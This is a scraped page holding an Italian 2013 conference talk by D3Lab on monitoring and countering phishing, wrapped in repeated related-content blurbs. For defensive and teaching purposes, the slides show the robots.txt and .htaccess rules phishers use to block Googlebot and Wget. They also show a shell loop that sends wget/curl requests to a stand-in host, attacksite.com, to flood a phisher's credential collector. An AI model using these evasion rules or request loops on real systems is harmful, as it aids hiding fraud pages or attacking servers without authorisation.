Gophish, un framework Open Source sviluppato in Go che permette di simulare campagne di Phishing; dall’invio delle email fraudolente alla finta pagina web che dovrà carpire le informazioni sensibili.
È un ottimo strumento per simulare all’interno della propria organizzazione una campagna di Phishing e individuare il personale più vulnerabile e probabilmente da formare per prevenire danni derivati da una vera campagna di Phishing.
This document discusses hacking and phishing. It defines hacking and lists common hacking methods like inside jobs, rogue access points, and viruses. It then focuses on phishing, explaining that phishers masquerade as trustworthy entities to steal personal information. The document describes how phishers use software and free web hosting to create fake websites, upload phishing pages, and steal email credentials. It warns readers to think twice before clicking links to avoid falling for phishing scams.
This document discusses phishing, which is a form of online fraud that aims to steal users' sensitive information such as usernames, passwords, and credit card details. It does this through deceptive messages that appear to come from legitimate organizations but actually lead to fake websites or download malware. The document provides information on how phishing works, techniques used to detect and prevent it, and tips for users to avoid falling victim to phishing scams.
Gophish, un framework Open Source sviluppato in Go che permette di simulare campagne di Phishing; dall’invio delle email fraudolente alla finta pagina web che dovrà carpire le informazioni sensibili.
È un ottimo strumento per simulare all’interno della propria organizzazione una campagna di Phishing e individuare il personale più vulnerabile e probabilmente da formare per prevenire danni derivati da una vera campagna di Phishing.
This document discusses hacking and phishing. It defines hacking and lists common hacking methods like inside jobs, rogue access points, and viruses. It then focuses on phishing, explaining that phishers masquerade as trustworthy entities to steal personal information. The document describes how phishers use software and free web hosting to create fake websites, upload phishing pages, and steal email credentials. It warns readers to think twice before clicking links to avoid falling for phishing scams.
This document discusses phishing, which is a form of online fraud that aims to steal users' sensitive information such as usernames, passwords, and credit card details. It does this through deceptive messages that appear to come from legitimate organizations but actually lead to fake websites or download malware. The document provides information on how phishing works, techniques used to detect and prevent it, and tips for users to avoid falling victim to phishing scams.
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Gianfranco Tonello
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende
Milano, 23 ottobre 2013
Questo workshop ha carattere tecnico-divulgativo ed ha come obiettivo quello di presentare al pubblico le modalità di attacco di alcune delle più diffuse tipologie di virus-malware progettati per carpire le credenziali di accesso all’on-line banking effettuato dai computer infetti.
Verranno presentate le varie tattiche di aggancio al browser attraverso le quali questi agenti malware sono in grado di rubare le credenziali di accesso agli ignari utenti o dirottare, a loro favore, pagamenti reali effettuati operativamente dall’utente legittimo.
1. Presentazione dei principali agenti malware realizzati con l’obiettivo di trasferire denaro dal conto corrente bancario dell’utente verso conti in paesi stranieri: da Zeus/Zbot, passando per il Sinowal, Gataka e Carberp.
2. I principali metodi di infezione che verranno presentati sono:
- diffusione attraverso e-mail con allegati allodola;
- diffusione attraverso falsi file .PDF;
- diffusione attraverso applet di flash player;
- diffusione attraverso JavaScript nascosti in pagine Web.
3. Presentazione di come avvenga l’infezione sul computer.
4. Illustrazione di come operativamente questi agenti malware siano in grado di bypassare il controllo attraverso chiavette PassKey-OTP, e il codice di verifica inviato via SMS.
5. Come cercare di prevenire l’infezione non solo dalle varianti già note ma anche e soprattutto dalle nuove varianti sconosciute all’antivirus in uso.
6. Conclusione e domande del pubblico. - See more at: http://www.smau.it/milano13/schedules/stato-dellarte-delle-truffe-bancarie-dal-phishing-ai-trojanbanker-come-si-diffonde-e-come-ci-si-difende/#sthash.8SgX7VUf.dpuf
APT, Social Network e Cybercriminali: Strategie difensiveiDIALOGHI
APT, un cyberattacco mirato e persistente
Chiunque può essere un bersaglio
Obiettivi economici, tecnici, militari, politici
Dal Social Engineering ai Social Networks
Minacce derivanti dai Social Media
I Social Media sono bersagli
...ma sono anche il paradiso del Cybercrime
Incidenti più eclatanti
Maladvertising
Strategie difensive
La presenza sempre più assidua delle tecnologie e l’espansione continua dei social networks hanno contribuito ad un cambiamento radicale nella società,
incidendo sulla definizione della circolazione dei contenuti audiovisivi e nella costruzione della loro popolarità.
Il fenomeno principale nella determinazione delle dinamiche di circolazione dei prodotti audiovisivi è certamente la pirateria, un fenomeno non proprio nuovo, ma di certo sempre più presente nella definizione dei menù di intrattenimento personali.
La pirateria informatica, quindi, definita anche copia vietata dai detentori dei diritti d’autore, indica varie attività di natura illecita perpetrate tramite l'utilizzo di strumenti informatici.
Priolo Lorena, Carlotta Benassi e Chiara Guarnieri
Pillole di Autodifesa Digitale - Protezione Social Network Pawel Zorzan Urban
E’ possibile Hackerare un profilo Social?
Come posso scoprire se il mio profilo è stato hackerato?
Come posso proteggere il mio profilo?
Come mi devo comportare dopo essere stato hackerato?
Questo e altro per avere le idee chiare sulla gestione dei propri profili social.
Intervento del Presidente Squillace all'evento "Safety e Security negli impianti automatizzati" per la consegna degli AI - Award 2016 (cfr. http://www.automazioneindustriale.com/convegno-safety-e-security-negli-impianti-automatizzati-milano-29-novembre-2016/ )
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importanteLuca Moroni ✔✔
Breve seminario sulla sicurezza ai ragazzi del Liceo Tron di Schio in occasione della ricorrenza dei 50 anni dalla nascita a cui sono stato invitato come relatore essendo stato un ex alunno
Dagli alert alle denunce: il caso di Poste Italianearmandoleotta
Un caso di phishing andato a buon fine? Un caso reale di un ammanco su un conto BancoPosta: risposte, osservazioni e riflessioni sui livelli di sicurezza offerti all'utenza.
Quotidianamente sfruttiamo computer o smartphone per rimanere interconnessi con il mondo digitale. Online condividiamo i nostri stati d'animo, gestiamo i conti bancari, facciamo acquisti, studiamo e lavoriamo. Viviamo in una società digitale che offre enormi vantaggi, ma nasconde anche pericolose trappole. Ogni volta che sfruttiamo una comunicazione digitale rischiamo che ci vengano sottratti informazioni, segreti, soldi e la nostra identità. Il phishing è una truffa dove un malintenzionato cerca di ingannare la vittima convincendola a fornire credenziali d'accesso, dati finanziari o informazioni personali. Si tratta di una attività illegale che sfrutta l'ingegneria sociale: il malintenzionato effettua un invio massivo di messaggi che imitano, nell'aspetto e nel contenuto, messaggi legittimi di fornitori di servizi; tali messaggi fraudolenti richiedono di fornire informazioni riservate. In prevalenza è una truffa eseguita usando la posta elettronica, ma non mancano casi simili che sfruttano altri mezzi, quali i messaggi SMS.
il phishing rappresenta una minaccia sottostimata, considerata banale e sciocca, ma di cui si ha poca conoscenza e per tali motivi rappresenta per i criminali una grosse fonte di guadagno. Il phishing è conveniente per i criminali: veloce, economico, pagante, con rischio minimo
More Related Content
Similar to Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Gianfranco Tonello
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende
Milano, 23 ottobre 2013
Questo workshop ha carattere tecnico-divulgativo ed ha come obiettivo quello di presentare al pubblico le modalità di attacco di alcune delle più diffuse tipologie di virus-malware progettati per carpire le credenziali di accesso all’on-line banking effettuato dai computer infetti.
Verranno presentate le varie tattiche di aggancio al browser attraverso le quali questi agenti malware sono in grado di rubare le credenziali di accesso agli ignari utenti o dirottare, a loro favore, pagamenti reali effettuati operativamente dall’utente legittimo.
1. Presentazione dei principali agenti malware realizzati con l’obiettivo di trasferire denaro dal conto corrente bancario dell’utente verso conti in paesi stranieri: da Zeus/Zbot, passando per il Sinowal, Gataka e Carberp.
2. I principali metodi di infezione che verranno presentati sono:
- diffusione attraverso e-mail con allegati allodola;
- diffusione attraverso falsi file .PDF;
- diffusione attraverso applet di flash player;
- diffusione attraverso JavaScript nascosti in pagine Web.
3. Presentazione di come avvenga l’infezione sul computer.
4. Illustrazione di come operativamente questi agenti malware siano in grado di bypassare il controllo attraverso chiavette PassKey-OTP, e il codice di verifica inviato via SMS.
5. Come cercare di prevenire l’infezione non solo dalle varianti già note ma anche e soprattutto dalle nuove varianti sconosciute all’antivirus in uso.
6. Conclusione e domande del pubblico. - See more at: http://www.smau.it/milano13/schedules/stato-dellarte-delle-truffe-bancarie-dal-phishing-ai-trojanbanker-come-si-diffonde-e-come-ci-si-difende/#sthash.8SgX7VUf.dpuf
APT, Social Network e Cybercriminali: Strategie difensiveiDIALOGHI
APT, un cyberattacco mirato e persistente
Chiunque può essere un bersaglio
Obiettivi economici, tecnici, militari, politici
Dal Social Engineering ai Social Networks
Minacce derivanti dai Social Media
I Social Media sono bersagli
...ma sono anche il paradiso del Cybercrime
Incidenti più eclatanti
Maladvertising
Strategie difensive
La presenza sempre più assidua delle tecnologie e l’espansione continua dei social networks hanno contribuito ad un cambiamento radicale nella società,
incidendo sulla definizione della circolazione dei contenuti audiovisivi e nella costruzione della loro popolarità.
Il fenomeno principale nella determinazione delle dinamiche di circolazione dei prodotti audiovisivi è certamente la pirateria, un fenomeno non proprio nuovo, ma di certo sempre più presente nella definizione dei menù di intrattenimento personali.
La pirateria informatica, quindi, definita anche copia vietata dai detentori dei diritti d’autore, indica varie attività di natura illecita perpetrate tramite l'utilizzo di strumenti informatici.
Priolo Lorena, Carlotta Benassi e Chiara Guarnieri
Pillole di Autodifesa Digitale - Protezione Social Network Pawel Zorzan Urban
E’ possibile Hackerare un profilo Social?
Come posso scoprire se il mio profilo è stato hackerato?
Come posso proteggere il mio profilo?
Come mi devo comportare dopo essere stato hackerato?
Questo e altro per avere le idee chiare sulla gestione dei propri profili social.
Intervento del Presidente Squillace all'evento "Safety e Security negli impianti automatizzati" per la consegna degli AI - Award 2016 (cfr. http://www.automazioneindustriale.com/convegno-safety-e-security-negli-impianti-automatizzati-milano-29-novembre-2016/ )
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importanteLuca Moroni ✔✔
Breve seminario sulla sicurezza ai ragazzi del Liceo Tron di Schio in occasione della ricorrenza dei 50 anni dalla nascita a cui sono stato invitato come relatore essendo stato un ex alunno
Dagli alert alle denunce: il caso di Poste Italianearmandoleotta
Un caso di phishing andato a buon fine? Un caso reale di un ammanco su un conto BancoPosta: risposte, osservazioni e riflessioni sui livelli di sicurezza offerti all'utenza.
Quotidianamente sfruttiamo computer o smartphone per rimanere interconnessi con il mondo digitale. Online condividiamo i nostri stati d'animo, gestiamo i conti bancari, facciamo acquisti, studiamo e lavoriamo. Viviamo in una società digitale che offre enormi vantaggi, ma nasconde anche pericolose trappole. Ogni volta che sfruttiamo una comunicazione digitale rischiamo che ci vengano sottratti informazioni, segreti, soldi e la nostra identità. Il phishing è una truffa dove un malintenzionato cerca di ingannare la vittima convincendola a fornire credenziali d'accesso, dati finanziari o informazioni personali. Si tratta di una attività illegale che sfrutta l'ingegneria sociale: il malintenzionato effettua un invio massivo di messaggi che imitano, nell'aspetto e nel contenuto, messaggi legittimi di fornitori di servizi; tali messaggi fraudolenti richiedono di fornire informazioni riservate. In prevalenza è una truffa eseguita usando la posta elettronica, ma non mancano casi simili che sfruttano altri mezzi, quali i messaggi SMS.
il phishing rappresenta una minaccia sottostimata, considerata banale e sciocca, ma di cui si ha poca conoscenza e per tali motivi rappresenta per i criminali una grosse fonte di guadagno. Il phishing è conveniente per i criminali: veloce, economico, pagante, con rischio minimo
Il phishing non è un crimine digitale banale, in cui cadono solo gli sciocchi, come spesso viene stereotipato, ma rappresenta una minaccia sempre attuale perchè, come sempre, i cybercriminali ...guardano avanti
Computer Forensics e L.48/2008 - Avv. Giovanni battista Gallusdenis frati
descrizione delle modifiche apportate dal recepimento della convenzione di Budapest agli articoli di procedura penale e del codice penale relativi al cybercrimes
LA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e Giuridicidenis frati
Seminari di Diritto Penale dell'Informatica organizzato da Osservatorio CSIG Ivrea & Camera Penale Vittorio Chiusano - incontro tenutosi ad Ivrea (TO) il 4 maggio 2007
2. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 1
Frode utenti Telepass
21-6-2012: 50 cc validi luhn
Frode utenti Poste Pay
14-11-2012: 17 cc validi luhn
Frode utenti PayPal 15-11-2012:
5 cc validi luhn
Frode Agip/Eni 19-11-2012: 17
cc validi luhn
Frode utenti Visa 20-11-2012:
23 cc validi luhn
ecc... ecc... ecc...
Il phishing non e' la truffa degli sciocchi!!
Denis Frati – D3Lab
Www.d3lab.net
3. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 2
Il phishing non e' solo bancario – 1
(social network)
Denis Frati – D3Lab
Www.d3lab.net
4. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 2
Il phishing non e' solo bancario – 2
(e-mail account)
Denis Frati – D3Lab
Www.d3lab.net
5. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 2
Il phishing non e' solo bancario – 2
(On-line game)
Denis Frati – D3Lab
Www.d3lab.net
6. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… Se ne frega dell'otp
Denis Frati – D3Lab
Www.d3lab.net
7. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… Perche' gli bastano le carte di credito - 1
Denis Frati – D3Lab
Www.d3lab.net
8. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… Perche' gli bastano le
carte di credito - 2
Denis Frati – D3Lab
Www.d3lab.net
9. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… o l'accesso agli account in cui reperirle
Denis Frati – D3Lab
Www.d3lab.net
10. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Generalita'
Il Phishing è:
●
●
●
●
di semplice attuazione;
poco dispendioso;
trans-frontaliero;
a basso rischio;
si avvantaggia di:
●
●
●
Denis Frati – D3Lab
Www.d3lab.net
ampio bacino vittime;
innumerevoli target;
pericolosità sottostimata;
11. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Di cosa necessita' il phisher ? - 1
- Il kit Kit di phishing:
l'insieme di pagine html/htm,
php ed immagini, riproducenti
quelle dell'ente target.
<--- li fanno e
li vendono
Denis Frati – D3Lab
Www.d3lab.net
12. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Di cosa necessita' il phisher ? - 2
- liste di indirizzi mail & mail server Liste di indirizzi email a cui
inviare le mail fraudolente.
Sistema invio mail:
●
●
●
●
Denis Frati – D3Lab
Www.d3lab.net
mail sender php;
server di posta violati;
macchine compromesse;
connessioni wireless
aperta;
13. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Di cosa necessita' il phisher ? - 3
- SPAZIO di hosting Spazio di hosting:
●
●
●
●
Denis Frati – D3Lab
Www.d3lab.net
gratuito;
a pagamento;
sito violato;
sulla propria macchina +
dns dinamico;
14. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
FUNZIOnamento base
3
2
1
6
4
5
6
Denis Frati – D3Lab
Www.d3lab.net
15. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Previsioni, preveggenza, vaticinio ???
Denis Frati – D3Lab
Www.d3lab.net
16. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
monitoraggio
Undergorund & cyber crime intelligence
False pagine web on-line
Attack spread
Provenienza
Profili utente
Denis Frati – D3Lab
Www.d3lab.net
17. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
Undergorund & cyber crime intelligence
Tra il dire ed il fare …
sono necessari:
●
●
●
●
●
●
●
struttura;
risorse umane;
tempo
conoscenza degli “ambienti”
storico: profili, attività, partecipazioni, conoscenze
referenze;
ecc;
… non basta iscriversi ad un forum/blog underground,
frequentare saltuariamente un canale irc su un server .ru
Denis Frati – D3Lab
Www.d3lab.net
18. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
Presenza false pagine web on-line
●
●
●
●
il phishing è dinamico, veloce!
raramente sono presenti collegamenti a
pagine web indicizzate;
l'indicizzazione è spesso successiva alle prime
segnalazioni di frode;
il phisher conosce benissimo e usa:
➔
➔
robot.txt;
htaccess;
User-agent: *
Disallow: /folder1/
User-Agent: Googlebot
Disallow: /folder2/
RewriteEngine On
...
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot
RewriteRule ^.* - [F,L]
Denis Frati – D3Lab
Www.d3lab.net
19. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
ATTACK spread
●
falsificazione degli header della mail
Notifica mancati recapiti ->WARNING
un diluvio di notifiche che può anche mettere
in crisi il web server
Return-Path: <info@mycompany.it>
●
invio massiccio di mail anche a indirizzi
inesistenti
sono necessari:
●
monitoraggio data-base on line;
●
mail box civetta;
●
segnalatori (spesso i clienti verso filiali);
… buongiorno ho visto la mail per il concorso,
quello del bonus per la ricarica
addestrare il personale
a ricevere le segnalazioni
… scusi mi avete scritto per un mio conto ...ma
io non sono vostro cliente ….
Denis Frati – D3Lab
Www.d3lab.net
Scusi?? mi spieghi bene, …
…mi inoltri la mail,
…può inviarmi il sorgente della
mail?
20. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
Monitorare la provenienza - 1
188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820
"http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03;
Windows ME) Opera 5.11 [en]"
Source Ip address: 188.216.109.13
Data: [25/May/2013:17:30:46 -0700]
Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1"
Risposta server: 200 6820
Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php"
User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"
from http://httpd.apache.org/docs/2.2/logs.html
la vittima viene rimandata a specifiche pagine legittime;
noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no
*.mycompany.com, ecc..)
Denis Frati – D3Lab
Www.d3lab.net
21. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Dal Monitoraggio al contrasto
Attraverso Monitoraggio provenienza
referer pericoloso
su pagina login
azioni di verifica diretta
identifico
cliente
confronto profilo cliente
ulteriori verifiche
rilevo IP possibile
vittima
Frode ?
Y
fatto login ?
N
Y
blocco account
blocco operatività
1- test security company, curiosi, casuale, ecc
2- cliente che non prosegue con login
Denis Frati – D3Lab
Www.d3lab.net
N
Evento >> log.db
22. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
Richieste shutdown
Eliminare le pagine web fraudolente è imperativo, ma …
… realisticamente i mezzi sono pochi!
Si inoltrano le richieste a:
● gestori siti web;
● gestori server;
● hoster;
● fornitori connettività;
Tuttavia permangono problemi dovuti a:
● orari, fusi orari e festività;
● difficoltà contatto;
● servizi whois privacy;
● incomprensioni linguistiche;
● diffidenza;
Denis Frati – D3Lab
Www.d3lab.net
23. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Contrasto - Richieste shutdown – PLAYNG WITH
redirect
Denis Frati – D3Lab
Www.d3lab.net
24. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Contrasto - Richieste shutdown
PLAYNG WITH DYNAMIC DNS & fake sub domain
I servizi di DNS dinamico permettono al
criminale di:
● creare domini con nomi ingannevoli;
● mantenere le strutture/pagine web al
sicuro su proprie macchine connesse
in rete via SIM card
● celare la reale posizione delle pagine
- É necessario tracciare gli indirizzi IP
correlati ai domini
- intervenire
•
con corretti titolari degli IP
•
Fornitori servizio Dyn DNS
Il criminale:
● aggredisce il sito A;
● accede al pannello digestione
domini/DNS
● imposta subdomini con wild card;
● aggredisce il sito B
● inocula le pagine fraudolente
● dirotta su di esse i subdomini di A
www.post4.it.sitobucato.com
È necessario intervenire con tutte le
parti:
● gestori dei siti A & B
● hoster dei siti A & B
● fornitori connettività A & B;
Denis Frati – D3Lab
Www.d3lab.net
25. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
Credentials bombing
Le credenziali rubate vengono:
● spedite via mail al criminale;
● scritte su file di testo (locali o remoti);
● scritte in db remoti;
Ehi Cattivo?!?! Vuoi le credenziali ???
Eccole!!
A=1
while [ $A -eq 1 ]
do
wget/curl http://attacksite.com/login.php?user&pass&pin
done
Denis Frati – D3Lab
Www.d3lab.net
26. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
Credentials search
Se le credenziali sono scritte su file possono
essere individuate !!
Però lo sanno anche loro e
le scrivono in /tmp che
leggono via shell remote
Denis Frati – D3Lab
Www.d3lab.net
27. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
kit search
L'individuazione del kit mi consente di
● Sapere dove (presumibilmente) finiscono
le credenziali;
● Profilare il possibile utilizzatore o autore
del kit;
● Conoscere la propria pagina da
monitorare nei log http per i referer non
trusted;
● Conoscere le proprie risorse (immagini,
applet flash, css, ecc...) usate dei
criminali per bloccarle;
Denis Frati – D3Lab
Www.d3lab.net
28. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
I WANT TO BE BAD! - 1
Hai trovato una shell remota!!!
Grida di giubilio!!
Puoi entrare e sderenarli!!
Denis Frati – D3Lab
Www.d3lab.net
29. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
I WANT TO BE BAD! - 2
Ricorda:
vuoi utilizzare exploit e shell remote come il phisher per contrastarlo?
Commetti almeno un reato
Art. 615 ter. C.p.(accesso abusivo a sistem informatico)
se non due
Art. 617 quinquies. C.p. (danneggiamento sistema informatico).
E le responsabilità aziendali ?!?!
Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché
acquisiste in modo illecito!
Denis Frati – D3Lab
Www.d3lab.net
30. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
I WANT TO BE BAD! - 3
Ricorda:
puoi accedere (illecitamente) allo spazio usato dal criminale,
cancellare i suoi file, le pagine web fraudolente, ma …
… se la vulnerabilità che ha permesso l'accesso al criminale permane..
NON HAI RISOLTO MOLTO.
È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la
porta è ancora aperta!
Denis Frati – D3Lab
Www.d3lab.net
31. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio & Analisi a tutto campo
Basi del contrasto
Un monitoraggio ampio e continuo
permette:
● Rilevare cambi di modalità operativa;
● Individuare nuove piattaforme bersaglio
per inoculazione;
● Conoscere nomi dei file di credenziali e
delle shell remote;
● Individuare i kit;
● Riconoscere la “firma” degli autori e
profilarli;
● Individuare nell'analisi attacchi a non
clienti tracce di attacco a clienti;
● Ipotizzare possibili futuri enti bersaglio.
Denis Frati – D3Lab
Www.d3lab.net
32. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Previsioni, preveggenza, vaticinio ???
Il monitoraggio a largo raggio fornisce indicazioni
sugli orientamenti dei phisher:
es. agosto 2012 rilavati attacchi a EDF (fornitore
energia francese)
Fine 2012 attacchi a Gruppo, Agip/Eni
es. agosto 2012 attacchi BNP-PARIBAS (DE)
Autunno 2012 attacchi BNP-PARIBAS (IT)
Maggio 2013 attacchi BNP-PARIBAS (ES)
es:fine 2012 attacchi Deteuche Bank IT
1° quadr. 2013 attacchi Deteuche Bank (DE)
Phishing forecast: chi verrà attaccato nei prossimi giorni?
www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher
Denis Frati – D3Lab
Www.d3lab.net
33. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
formazione
La (in)formazione del cliente può
avere un buon ritorno di immagine, a
costi contenuti.
Gli avvisi sulle pagine web non li
legge nessuno,ancor meno i deplian.
La formazione degli utenti interni, dei
dipendenti, porta solo sicurezza.
Kevin Mitnick parlava di formazione
aziendale a contrasto dall'ingegneria
sociale già nel 2002 (l'arte
dell'inganno).
Denis Frati – D3Lab
Www.d3lab.net
34. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
domande
Denis Frati – D3Lab
Www.d3lab.net
35. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Contatti:
d3lab ~ $ whois denisfrati
Registrant Info:
Registrant: denis frati
Mail address: info@d3lab.net
Company: D3Lab
Address: Ivrea (TO) – V. Jervis, 4
Phone: +39-0125-1963370
Fax: +39-0125-1963371
Compeny web site: www.d3lab.net
Personal web site: www.denisfrati.it
Expires on..............: never
Last modified on........: 2012-02-20
Denis Frati – D3Lab
Www.d3lab.net